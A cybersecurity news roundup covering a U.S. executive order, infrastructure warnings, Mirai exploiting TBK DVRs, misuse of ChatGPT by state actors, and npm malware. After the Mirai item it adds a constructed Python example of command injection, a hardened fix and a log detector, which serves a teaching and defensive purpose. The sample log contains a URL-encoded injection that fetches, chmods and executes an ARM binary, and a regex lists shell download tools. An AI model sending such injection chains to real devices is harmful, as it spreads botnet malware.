Cybersecurity News: Cyber executive order, Neuberger’s infrastructure warning, Mirai botnet warning

In today’s cybersecurity news…

Presidential cyber executive order signed

The President signed a new executive order that refocuses U.S. cybersecurity policy on secure software development, updated encryption, and internet routing security. The order revokes parts of Biden- and Obama-era directives, including digital identity initiatives, which it says could increase fraud risk. It criticizes the previous administration for politicizing cybersecurity and redirects federal AI cybersecurity work away from what it characterizes as censorship and toward identifying and managing vulnerabilities. It rolls back compliance mandates for software vendors in favor of collaboration with industry partners, and it also addresses post-quantum cryptography and consumer device security.

(Cyberscoop)

Neuberger warns of U.S. infrastructure’s cyberattack weakness

Former NSA cybersecurity director Anne Neuberger warned that U.S. critical infrastructure would likely collapse under a major cyberattack because of unaddressed vulnerabilities and workforce cuts, which she said have worsened under the current administration. Speaking at the AI Expo for National Competitiveness, she criticized recent reductions at CISA as weakening national defenses. Neuberger advocated AI-driven approaches, including using AI to assess legacy systems and digital twins to simulate infrastructure weaknesses, and argued that while the loss of talent is harmful, AI offers a strategic opportunity to fill critical gaps in protecting essential U.S. systems.

(The Register)

Mirai botnet infects TBK DVR devices via command injection flaw

A new variant of the Mirai botnet malware is exploiting a command injection vulnerability, CVE-2024-3721, in TBK DVR-4104 and DVR-4216 digital video recorders. Security researcher “netsecfish” disclosed the flaw in April 2024 along with a proof-of-concept exploit; Kaspersky researchers now report seeing it exploited in the wild. The exploit drops an ARM32 binary that connects to a command-and-control server and enrolls the recorder in the botnet, which is then used for DDoS attacks and other malicious activity.

(BleepingComputer)
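To make the vulnerability class concrete, here is an added example that is not code from the article, from TBK, or from the Mirai sample. The page does not describe the DVR’s actual vulnerable parameter, so the “ping” handler, the `/device.cgi` path and the access-log lines below are constructed stand-ins: a query parameter spliced into a shell command, the same handler hardened with an allowlist and no shell, and a small detector that flags the shell metacharacters and download-and-run chain that botnet loaders typically push through such a flaw.

```python
import re
import subprocess
import urllib.parse

# --- Vulnerable pattern: user input spliced into a shell command string ---
def vulnerable_ping(host: str) -> str:
    """Embedded-web-UI style handler (constructed). 'echo' stands in for 'ping'
    so the demonstration is harmless and runs anywhere; the defect is identical."""
    cmd = f"echo pinging {host}"          # attacker controls part of the command line
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# --- Hardened pattern: validate the parameter, then pass it as one argv element ---
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")   # hostname / dotted IPv4 allowlist

def hardened_ping(host: str) -> str:
    """Reject anything outside the allowlist and never invoke a shell."""
    if not _HOST_RE.fullmatch(host):
        raise ValueError("rejected host parameter")
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout

# --- Detection over constructed access-log lines ---
# Shell metacharacters, or a fetch/chmod/execute chain, inside a query string.
_INJECTION_RE = re.compile(r"[;&|`$]|\b(?:wget|curl|tftp|chmod)\b|/bin/(?:sh|busybox)")
_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')

def suspicious_requests(log_lines):
    """Return (path, decoded_query) for each request whose query looks like injection."""
    hits = []
    for line in log_lines:
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        decoded = urllib.parse.unquote_plus(query)   # decode before matching
        if _INJECTION_RE.search(decoded):
            hits.append((path, decoded))
    return hits

# Constructed sample log: one benign request, one carrying a loader chain.
# Addresses are from documentation ranges; the path and parameter are invented.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Jun/2025:10:01:02 +0000] '
    '"GET /device.cgi?host=192.0.2.10 HTTP/1.1" 200 51',
    '198.51.100.7 - - [09/Jun/2025:10:01:09 +0000] '
    '"GET /device.cgi?host=192.0.2.10%3Bwget%20http%3A%2F%2F198.51.100.9%2Farm.bin'
    '%3Bchmod%20777%20arm.bin%3B.%2Farm.bin HTTP/1.1" 200 51',
]

if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable output:", repr(vulnerable_ping(payload)))   # second command ran
    try:
        hardened_ping(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
    for path, query in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", path, query)
```

The hardened handler fixes the flaw in two independent ways: the allowlist rejects the metacharacters outright, and passing an argv list with `shell=False` means that even a value which slipped past validation could not start a second command. The detector is deliberately crude; on a real recorder it would be run against the device’s HTTP logs or an upstream proxy, and a hit is a prompt to check for unexpected ARM binaries and outbound connections, not a verdict on its own.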

OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation

OpenAI, the owner of ChatGPT, says threat actors from countries including China, Russia, North Korea, Iran, and the Philippines have been using the LLM in three key areas: generating social media comments; refining malware and assisting cyberattacks; and running foreign employment scams. In one example, operators used ChatGPT to post comments on topics such as U.S. politics on TikTok, X, Reddit, Facebook, and other platforms, then switched to other accounts that replied to those same comments. Others used it to help write scripts for brute-forcing passwords and to run employment scams, including arranging delivery of company laptops.

(The Record)

Huge thanks to our sponsor, Vanta

Is your manual GRC program slowing you down? There’s something more efficient than spreadsheets, screenshots, and manual processes — Vanta.

With Vanta, GRC can be so. much. easier—while also strengthening your security posture and driving revenue for your business. Vanta automates key areas of your GRC program—including compliance, risk, and customer trust—and streamlines the way you manage information.

The impact is real: A recent IDC analysis found that compliance teams using Vanta are one hundred and twenty nine percent more productive.

Get back time to focus on strengthening security and scaling your business. Get started at Vanta.com/headlines.

Supply chain malware hits npm and PyPI Ecosystems, targeting a global audience

This supply chain attack compromised more than a dozen npm packages associated with the GlueStack UI component library to deliver malware. According to Aikido Security, the malware lets an attacker run shell commands, take screenshots, upload files, steal sensitive information, and mine cryptocurrency; the affected packages collectively see nearly 1 million downloads per week. As The Hacker News reports, the code injected into the packages is “similar to the remote access trojan that was delivered following the compromise of another npm package ‘rand-user-agent’ last month, indicating that the same threat actors could be behind the activity.”

(The Hacker News)

BadBox botnet continues to exploit off-brand IoT devices

Following up on a story we covered last December, the BadBox 2.0 malware campaign continues to infect millions of connected devices worldwide, specifically IoT hardware such as “TV streaming devices, digital projectors, aftermarket vehicle infotainment systems, digital picture frames and other products,” which it then uses for criminal activity, according to an FBI alert. The agency says “the malware can come pre-installed in off-brand or aftermarket devices or arrive alongside software updates from sketchy sources.” The botnet lets its operators “mask their activity by making it appear to come from legitimate home networks, also known as residential proxies. In some cases, the operators sell access to the botnet to other cybercriminals,” the alert said.

(The Record)

Microsoft shares script to restore inetpub folder that you shouldn’t have deleted

Microsoft has released a PowerShell script that restores the empty ‘inetpub’ folder created by the April 2025 Windows security updates. The folder is part of the mitigation for a high-severity Windows Process Activation privilege escalation vulnerability, but many users deleted it, assuming it was leftover clutter, which left their systems exposed to the patched flaw again. Simply recreating the folder by hand is not the intended fix; the script creates it with the ownership and access control list the mitigation relies on.

(BleepingComputer)

Massive data breach of over 4 billion user records found exposed online

Cybersecurity researcher Bob Dyachenko and the Cybernews team uncovered a massive 631GB unsecured database in China containing over 4 billion records, likely affecting hundreds of millions of users. The leaked data includes WeChat, Alipay, financial, residential, and ID information, suggesting it was compiled for profiling, surveillance, or data enrichment. The largest collection, “wechatid_db,” contained over 805 million records; other collections held banking and address data. Researchers warn that threat actors could exploit the trove for fraud, phishing, blackmail, or even state-sponsored disinformation. The database was taken offline shortly after discovery, and its owner remains unidentified.

(Security Affairs)

Steve Prentice
Author, speaker, expert in the area where people and technology crash into each other, viewed from the organizational psychology perspective. Host of many podcasts, voice actor and narrator for corporate media and audiobooks. Ghost-writer for busy executives.